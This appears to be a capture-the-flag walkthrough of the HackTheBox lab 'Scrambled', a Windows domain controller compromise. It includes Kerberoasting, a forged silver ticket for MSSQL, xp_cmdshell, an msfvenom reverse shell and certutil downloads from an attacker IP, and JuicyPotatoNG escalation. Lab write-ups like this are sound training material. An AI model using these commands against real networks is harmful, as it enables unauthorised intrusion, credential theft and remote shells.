
Scrambled

Port scan

$ sudo nmap 10.10.11.168 -p- -T4 --min-rate=10000 -sCV
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Scramble Corp Intranet
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-17 02:55:24Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-17T02:58:43+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-07-17T02:44:27
|_Not valid after:  2025-07-17T02:44:27
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-07-17T02:44:27
|_Not valid after:  2025-07-17T02:44:27
|_ssl-date: 2024-07-17T02:58:43+00:00; -2s from scanner time.
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-07-17T02:54:17
|_Not valid after:  2054-07-17T02:54:17
|_ssl-date: 2024-07-17T02:58:43+00:00; -2s from scanner time.
| ms-sql-info: 
|   10.10.11.168:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-07-17T02:44:27
|_Not valid after:  2025-07-17T02:44:27
|_ssl-date: 2024-07-17T02:58:43+00:00; -2s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-07-17T02:44:27
|_Not valid after:  2025-07-17T02:44:27
|_ssl-date: 2024-07-17T02:58:43+00:00; -2s from scanner time.
4411/tcp  open  found?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|   FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|_    ERROR_UNKNOWN_COMMAND;
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC

$ echo "10.10.11.168 dc.scrm.local dc1.scrm.local scrm.local" | sudo tee -a /etc/hosts

Web app (port 80)


NTLM authentication is disabled.


support@scramblecorp.com

ksimpson


The site notes that a password reset sets a user's password to their username, so the pair ksimpson:ksimpson is worth trying.

SMB server

$ crackmapexec smb 10.10.11.168 -u 'ksimpson' -p 'ksimpson' --shares

$ smbmap -H 10.10.11.168 -u 'ksimpson' -p 'ksimpson'


Crackmapexec and smbmap both fail. This box was already retired when I did it and I was following Guided Mode, so I knew the credentials were valid for SMB; the site's note that NTLM authentication is disabled explains the failures, since both tools default to NTLM. After some research I found impacket's smbclient, which can authenticate with Kerberos.

# -k for Kerberos authentication
$ impacket-smbclient scrm.local/ksimpson:ksimpson@dc1.scrm.local -k -dc-ip 10.10.11.168


crackmapexec also works once it is told to use Kerberos:

$ crackmapexec smb dc1.scrm.local -u 'ksimpson' -p 'ksimpson' --shares -k -d scrm.local


Network Security Changes.pdf


Kerberoast attack (GetUserSPNs)

$ impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -target-domain scrm.local -k -dc-ip 10.10.11.168 -dc-host dc1.scrm.local -request


sqlsvc:Pegasus60

Convert plaintext password to NTLM hash

Generate NTLM hashes via command line

$ iconv -f ASCII -t UTF-16LE <(printf "Pegasus60") | openssl dgst -md4

MD4(stdin)= b999a16500b87d17ec7f2e2a68778f05
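The same NT hash computed in Python, added here as an example and not part of the original writeup: an NT hash is just MD4 over the UTF-16LE bytes of the password, with no salt and no iteration, which is why a hash recovered from one place can be reused as-is elsewhere. MD4 is implemented inline because hashlib's "md4" depends on OpenSSL's legacy provider and is absent on many current systems; the sample password is the one from the writeup, and the function names are this example's own.

```python
#!/usr/bin/env python3
"""NT hash = MD4(UTF-16LE(password)). Added example with its own pure-Python
MD4 (RFC 1320); not code from the original writeup."""
import struct

_MASK = 0xFFFFFFFF

# Per round: boolean function, additive constant, message-word order, shifts.
_ROUNDS = (
    (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
     tuple(range(16)), (3, 7, 11, 19)),
    (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
     (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
    (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
     (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
)


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """Return the 16-byte MD4 digest of data."""
    msg = bytearray(data)
    msg.append(0x80)                      # mandatory 1 bit, then zero padding
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", len(data) * 8)  # original length in bits, LE

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for func, const, order, shifts in _ROUNDS:
            for i in range(16):
                t = (-i) % 4  # register being updated cycles a, d, c, b
                x, y, z, w = v[t], v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
                v[t] = _rotl((x + func(y, z, w) + words[order[i]] + const) & _MASK,
                             shifts[i % 4])
        state = [(s + n) & _MASK for s, n in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """Lowercase hex NT hash of a password (UTF-16LE, no BOM, no salt)."""
    return md4(password.encode("utf-16-le")).hex()


if __name__ == "__main__":
    import sys
    # Sample password taken from the writeup; pass others on the command line.
    for pw in sys.argv[1:] or ["Pegasus60"]:
        print(f"{pw}: {nt_hash(pw)}")
```

Run with no arguments to hash Pegasus60. The empty password hashes to 31d6cfe0d16ae931b73c59d7e0c089c0, the value that flags blank-password accounts in an NT hash audit.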

Get the domain SID with ldapsearch

$ ldapsearch -H ldap://dc1.scrm.local -D ksimpson@scrm.local -w ksimpson -b "DC=scrm,DC=local" "(objectClass=user)"

ldap_bind: Strong(er) authentication required (8)
        additional info: 00002028: LdapErr: DSID-0C090259, comment: The server requires binds to turn on integrity checking if SSL\TLS are not already active on the connection, data 0, v4563

# Download server certificate
$ openssl s_client -connect dc1.scrm.local:636

# one-liner that saves just the certificate
$ echo -n | openssl s_client -connect dc1.scrm.local:636 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ldapserver.pem

Connecting to 10.10.11.168
depth=0 CN=DC1.scrm.local
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 CN=DC1.scrm.local
verify error:num=21:unable to verify the first certificate
verify return:1
depth=0 CN=DC1.scrm.local
verify return:1
DONE


Edit /etc/ldap/ldap.conf so that TLS_CACERT points at the downloaded certificate

#
# LDAP Defaults
#

# See ldap.conf(5) for details
# This file should be world readable but not world writable.

#BASE   dc=example,dc=com
#URI    ldap://ldap.example.com ldap://ldap-provider.example.com:666

#SIZELIMIT  12
#TIMELIMIT  15
#DEREF      never

# TLS certificates (needed for GnuTLS)
# TLS_CACERT    /etc/ssl/certs/ca-certificates.crt
TLS_CACERT  /home/kali/HTB/Scrambled/ldapserver.pem

# -Z issues a StartTLS request on the plain LDAP port
$ ldapsearch -H ldap://dc1.scrm.local -Z -D ksimpson@scrm.local -w ksimpson -b "DC=scrm,DC=local" "(objectClass=user)" > ldapsearch.opt

ldapsearch prints the objectSid attribute base64-encoded; this one belongs to the administrator account (RID 500):

AQUAAAAAAAUVAAAAhQSCo0F98mxA04uX9AEAAA==

Convert a SID between binary and string forms

#!/usr/bin/env python3
# Decode a base64 objectSid (as printed by ldapsearch) into S-1-5-... form.
# Binary layout: revision (1 byte), sub-authority count (1 byte),
# 48-bit identifier authority (big-endian), then 32-bit little-endian
# sub-authorities. Hard-coded for the five sub-authorities of a domain
# account SID.

import base64
import struct
import sys

b64sid = sys.argv[1]
binsid = base64.b64decode(b64sid)
# revision, count, skip the 6 authority bytes, then five sub-authorities
a, N, cccc, dddd, eeee, ffff, gggg = struct.unpack("<BBxxxxxxIIIII", binsid)
# identifier authority: 6 big-endian bytes read as a 16-bit high part and a 32-bit low part
bb, bbbb = struct.unpack(">xxHIxxxxxxxxxxxxxxxxxxxx", binsid)
bbbbbb = (bb << 32) | bbbb

print(f"S-{a}-{bbbbbb}-{cccc}-{dddd}-{eeee}-{ffff}-{gggg}")

$ python sid.py AQUAAAAAAAUVAAAAhQSCo0F98mxA04uX9AEAAA==
S-1-5-21-2743207045-1827831105-2542523200-500

The domain SID is that SID without the -500.
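A more general converter, added here as an example and not the writeup's own script: it accepts any number of sub-authorities, converts in both directions, and splits an account SID into the domain SID and the RID, which is the split described above. The only input it needs is the base64 objectSid shown above; the function names are this example's own.

```python
#!/usr/bin/env python3
"""Windows SID <-> string conversion. Added example, not from the writeup."""
import base64
import struct


def sid_from_bytes(raw: bytes) -> str:
    """Decode the binary SID layout: revision (1), sub-authority count (1),
    48-bit big-endian identifier authority, then `count` 32-bit LE sub-authorities."""
    if len(raw) < 8:
        raise ValueError("SID too short")
    revision, count = raw[0], raw[1]
    authority = int.from_bytes(raw[2:8], "big")
    if len(raw) != 8 + 4 * count:
        raise ValueError(f"expected {8 + 4 * count} bytes for {count} sub-authorities, got {len(raw)}")
    subs = struct.unpack(f"<{count}I", raw[8:])
    return "-".join(["S", str(revision), str(authority), *map(str, subs)])


def sid_to_bytes(sid: str) -> bytes:
    """Inverse of sid_from_bytes: S-R-A-s1-...-sn -> binary."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError(f"not a SID string: {sid!r}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15:  # SID_MAX_SUB_AUTHORITIES
        raise ValueError("too many sub-authorities")
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack(f"<{len(subs)}I", *subs))


def split_rid(account_sid: str) -> tuple[str, int]:
    """Split an account SID into (domain SID, RID): the RID is the last
    sub-authority and the domain SID is everything before it."""
    head, _, rid = account_sid.rpartition("-")
    return head, int(rid)


if __name__ == "__main__":
    import sys
    # Default input: the administrator objectSid printed by ldapsearch in the writeup.
    b64 = sys.argv[1] if len(sys.argv) > 1 else "AQUAAAAAAAUVAAAAhQSCo0F98mxA04uX9AEAAA=="
    sid = sid_from_bytes(base64.b64decode(b64))
    domain, rid = split_rid(sid)
    print(f"account SID : {sid}")
    print(f"domain SID  : {domain}")
    print(f"RID         : {rid}")
    assert sid_to_bytes(sid) == base64.b64decode(b64)  # round trip
```

Passing a different base64 objectSid on the command line prints its domain SID and RID the same way; well-known SIDs such as S-1-5-18 (with one sub-authority) round-trip through the same two functions.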

Get the domain SID with getPac.py

$ impacket-getPac -targetUser administrator scrm.local/ksimpson:ksimpson

Domain SID: S-1-5-21-2743207045-1827831105-2542523200

Generate a silver ticket

impacket-ticketer forges a service ticket for the MSSQLSvc SPN and encrypts it with sqlsvc's NT hash. The SQL service validates tickets with that same key and never consults the DC, so it accepts the forged PAC that presents the ticket holder as administrator; only rotating the service account's password invalidates such tickets.

$ impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -dc-ip dc1.scrm.local -spn MSSQLSvc/dc1.scrm.local:1433 administrator
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in administrator.ccache

MSSql (port 1433)

On Linux, Kerberos looks in predefined places for tickets, such as /tmp/krb5cc_[uid of current user] and any file pointed to by the KRB5CCNAME environment variable.

$ KRB5CCNAME=administrator.ccache impacket-mssqlclient -k dc1.scrm.local

SQL> select name, database_id from sys.databases;
name         database_id
----------   -----------
master                 1
tempdb                 2
model                  3
msdb                   4
ScrambleHR             5

SQL> use ScrambleHR;
SQL> SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;
TABLE_NAME
----------
Employees
UserImport
Timesheets

SQL> select * from Employees;
SQL> select * from UserImport;
LdapUser   LdapPwd             LdapDomain   RefreshInterval   IncludeGroups   
--------   -----------------   ----------   ---------------   -------------   
MiscSvc    ScrambledEggs9900   scrm.local                90               0   

# Check whether xp_cmdshell is enabled
SQL> SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
# Enable it (needs sysadmin-level rights, which the forged administrator ticket provides)
SQL> sp_configure 'show advanced options', '1';
SQL> RECONFIGURE;
SQL> sp_configure 'xp_cmdshell', '1';
SQL> RECONFIGURE;

xp_cmdshell is now enabled, so OS commands run as the sqlsvc service account.

User sqlsvc (unintended way)

This is not the intended path through the box: user.txt is not on sqlsvc's desktop, and since I was following Guided Mode I knew it was not.

SQL>  xp_cmdshell powershell -e JABjAGwAaQBlA......


The sqlsvc account holds SeImpersonatePrivilege, so a potato-style escalation such as JuicyPotatoNG applies.

JuicyPotatoNG | GitHub

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.2 LPORT=4444 -f exe > shell.exe 

Upload shell.exe and JuicyPotatoNG.exe to the target box.

> certutil -f -urlcache http://10.10.16.2/JuicyPotatoNG.exe juicypotato.exe

> certutil -f -urlcache http://10.10.16.2/shell.exe shell.exe

> .\juicypotato.exe -t * -p C:\users\sqlsvc\shell.exe


         JuicyPotatoNG
         by decoder_it & splinter_code

[*] Testing CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} - COM server port 10247 
[+] authresult success {854A20FB-2D44-457D-992F-EF13785D2B51};NT AUTHORITY\SYSTEM;Impersonation
[+] CreateProcessAsUser OK
[+] Exploit successful! 


User MiscSvc (intended way)

MiscSvc:ScrambledEggs9900

Configure Realm

The SCRM.LOCAL realm has to be added to the local krb5.conf.

My Kali did not have /etc/krb5.conf, so install it with sudo apt-get install krb5-user.

Change /etc/krb5.conf to:

[libdefaults]
        default_realm = SCRM.LOCAL
# The following libdefaults parameters are only for Heimdal Kerberos.
#        fcc-mit-ticketflags = true

[realms]
        SCRM.LOCAL = {
                kdc = dc1.scrm.local
                #admin_server = dc1.scrm.local
        }

[domain_realm]
        .scrm.local = SCRM.LOCAL
        scrm.local = SCRM.LOCAL

$ impacket-getTGT scrm.local/MiscSvc:ScrambledEggs9900
Impacket v0.11.0 - Copyright 2023 Fortra

Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

The KDC rejects requests when the client clock differs from its own by more than the permitted skew (five minutes by default), so sync the local clock against the DC first:

$ sudo ntpdate -u scrm.local
2024-07-17 03:13:12.674924 (-0400) -86408.498354 +/- 0.104567 scrm.local 10.10.11.168 s1 no-leap
CLOCK: time stepped by -86408.498354
CLOCK: time changed from 2024-07-18 to 2024-07-17

$ impacket-getTGT scrm.local/MiscSvc:ScrambledEggs9900
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Saving ticket in MiscSvc.ccache

$ export KRB5CCNAME=MiscSvc.ccache                    

$ evil-winrm -r SCRM.LOCAL -i dc1.scrm.local  

The ticket expires soon after it is created, so you may need to repeat these steps several times before you get an interactive session.
